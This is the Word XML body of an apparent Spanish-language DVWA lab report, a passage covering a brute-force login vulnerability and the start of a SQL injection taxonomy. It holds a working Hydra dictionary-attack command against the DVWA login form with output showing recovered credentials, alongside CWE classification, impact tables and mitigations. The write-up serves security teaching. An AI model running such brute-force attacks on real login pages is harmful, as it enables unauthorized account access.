        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Contraseñas hasheadas con MD5 sin salt — algoritmo roto, vulnerable a tablas arcoíris.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47530164"/>
    <w:p w14:paraId="20081B3A">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sobre MD5 como hash de contraseñas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AEFCDC">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MD5 fue diseñado para verificación de integridad de archivos, no para almacenamiento de contraseñas. Sus problemas para este uso son: (1) velocidad — una GPU moderna calcula miles de millones de hashes MD5 por segundo; (2) sin salt — dos usuarios con la misma contraseña tienen el mismo hash, permitiendo ataques de tablas arcoíris precomputadas; (3) colisiones conocidas — dos entradas distintas pueden producir el mismo hash. La alternativa correcta es bcrypt, argon2id o scrypt, algoritmos diseñados específicamente para ser lentos y con salt automático.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDA93E2">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>1. Descripción de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B9FF2F">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La sección Brute Force de DVWA presenta un formulario de login que no implementa ningún mecanismo de defensa contra intentos repetidos de autenticación. Un atacante puede automatizar miles de intentos por segundo usando herramientas como Hydra, probando combinaciones de usuario/contraseña de un diccionario hasta obtener acceso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B60D383">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>2. Causas de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E87A78">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a. Ausencia de validaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78696F43">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>El servidor no lleva conteo de intentos fallidos por usuario ni por IP. No existe mecanismo de penalización (tiempo de espera o bloqueo) ante credenciales incorrectas repetidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F90D2A"/>
    <w:p w14:paraId="4025DF0A">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>b. Errores de lógica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C23086B">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>El formulario usa método GET, exponiendo las credenciales en la URL. Las peticiones GET son trivialmente automatizables: Hydra puede repetirlas modificando solo los parámetros de la cadena de consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A773D2"/>
    <w:p w14:paraId="020ACD8E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>c. Manejo inadecuado de credenciales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D77B55">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Las contraseñas están almacenadas con hash MD5 sin salt. Además, la respuesta del servidor ante login fallido ("Username and/or password incorrect.") permite enumerar la existencia de usuarios cuando el mensaje varía entre usuario inexistente y contraseña incorrecta (en configuraciones más verbosas).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200615CA">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3. Mecanismo de ataque — Ataque de diccionario con Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC7D413">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Objetivo: obtener las credenciales válidas del panel de login de DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49086469"/>
    <w:p w14:paraId="23D9952D">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 1 — Analizar la petición de login (F12 / Burp Suite):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4D85B4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>URL de login fallido:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>http://&lt;IP&gt;/dvwa/vulnerabilities/brute/?username=admin&amp;password=test&amp;Login=Login</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Mensaje de fallo: "Username and/or password incorrect."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEC48F7">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 2 — Ataque con Hydra (diccionario rockyou.txt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4661714D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>danielaguirre@kali:~$ hydra -l admin \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -P /usr/share/wordlists/rockyou.txt \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;IP_VICTIMA&gt; http-get-form \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "/dvwa/vulnerabilities/brute/:username=^USER^&amp;password=^PASS^&amp;Login=Login:Username and/or password incorrect"</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Desglose:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -l admin          → usuario fijo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -P rockyou.txt    → wordlist de contraseñas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  http-get-form     → módulo para formularios con método GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "ruta:params:msg_fallo" → formato de configuración del módulo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EE9355">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 3 — Resultado de Hydra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FD20E4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[80][http-get-form] host: &lt;IP_VICTIMA&gt;   login: admin   password: password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1 valid password found!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D9C806">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[IMAGEN 6 — Hydra encontrando credenciales admin/password — fecha visible]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457F8C4B">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 4 — Verificación manual:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E1C442">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ingresar admin / password en el formulario → login exitoso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5331435B">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[IMAGEN 7 — Login exitoso con credenciales obtenidas por fuerza bruta — fecha visible]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB6C027">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>4. Clasificación técnica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9BB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864"/>
          </w:tcPr>
          <w:p w14:paraId="632D0B05">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Referencia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="28B3BA5A">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Detalle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1DA3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E887EB4">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CWE-307</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="239452F3">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Improper Restriction of Excessive Authentication Attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="72AF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0DC40EE8">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CWE-916</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5B195B1E">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Use of Password Hash With Insufficient Computational Effort (MD5 sin salt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="08CB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E31F06B">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CWE-521</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="514B0593">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Weak Password Requirements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2937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3C9D0326">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="63E07F56">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A07:2021 – Identification and Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1C1D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13EBF78">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVSS v4.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="430259BF">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>~7.5 High (red interna) / ~9.8 Critical (exposición pública)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56A57749">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>5. Impacto esperado en un sistema real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5F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864"/>
          </w:tcPr>
          <w:p w14:paraId="3E7E9BCF">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Dimensión CIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="60D4CF8E">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Impacto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="153670B7">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Justificación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5125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F25BAE8">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Confidencialidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="435AF6D6">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ALTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01FADFF5">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Acceso a información privada del usuario: datos personales, historial, mensajes, documentos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="556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2D27BE0D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Integridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6D282053">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ALTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="41A315B8">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>El atacante puede modificar datos, realizar transacciones o cambiar configuraciones en nombre de la víctima.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0E0C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D5B0CC4">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Disponibilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0798DAF9">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MEDIO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07EAB1D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>En sistemas con lockout (que DVWA no tiene), bloquear cuentas legítimas causa DoS selectivo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FA6CFCA">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>6. Propuesta de mitigación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5AAA8C">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Account lockout: bloquear la cuenta por 15 minutos tras 5 intentos fallidos consecutivos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD42574">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Rate limiting por IP: máximo N solicitudes de login por minuto desde la misma fuente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D78090">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>CAPTCHA: incorporar tras 3 intentos fallidos para impedir la automatización.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EACE47">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>MFA (Autenticación Multifactor): el segundo factor protege incluso si la contraseña es comprometida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7535DC32">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Algoritmos seguros de hashing: bcrypt, argon2id o scrypt con salt aleatorio automático.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AF8C19">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Usar método POST para formularios de login (las credenciales no quedan en la URL ni en logs HTTP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B48B30">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Monitorización: alertar al equipo SOC ante múltiples intentos fallidos desde una IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9CE40D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>──────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718A4D04">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22704F9C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerabilidad 8 — SQL Injection &amp; SQL Injection (Blind)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E41A62">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Teoría</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5451B55C">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La inyección SQL es probablemente la vulnerabilidad web más estudiada y documentada de la historia, y aun así continúa siendo una de las más prevalentes. Ocurre cuando datos proporcionados por el usuario se insertan directamente en una consulta SQL sin parametrización, permitiendo al atacante alterar la lógica de la consulta o inyectar sentencias SQL adicionales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CE530E"/>
    <w:p w14:paraId="2AB5A230">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>El problema fundamental es la mezcla de código (SQL) con datos (input del usuario) en una misma cadena de texto. El motor de base de datos no puede distinguir si una comilla simple que aparece en la cadena fue puesta por el programador o por un atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412DBFC5"/>
    <w:p w14:paraId="766938E8">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Taxonomía de SQL Injection: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4EE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864"/>
          </w:tcPr>
          <w:p w14:paraId="32B8C7DD">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tipo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="3B844CBD">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="0167B4AF">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Indicador</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6F10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A43106B">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>In-band / Error-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21364056">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>La aplicación devuelve los datos extraídos directamente en la respuesta o muestra mensajes de error SQL detallados.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CEBB82D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Errores SQL visibles en la página</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0D63C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45A1AE37">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>In-band / UNION-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0B7D003B">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>El atacante usa UNION SELECT para combinar la query original con una query maliciosa y obtener datos en la respuesta.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0E99B117">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>La respuesta muestra filas adicionales de tablas no esperadas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7FF0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387BA5">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Blind Boolean-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11ADFDAD">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>La aplicación no devuelve datos pero responde de forma diferente ante condiciones verdaderas o falsas (mensaje/comportamiento).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C8E9C43">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Dos respuestas distintas según el resultado de la condición</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6749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47BB54A3">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Blind Time-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0C17EABB">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>La aplicación no varía su respuesta, pero el atacante infiere datos por el tiempo que tarda en responder usando SLEEP().</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="366133F7">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Demoras en la respuesta correlacionadas con condiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6367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D57DC93">
            <w:r>
              <w:rPr>
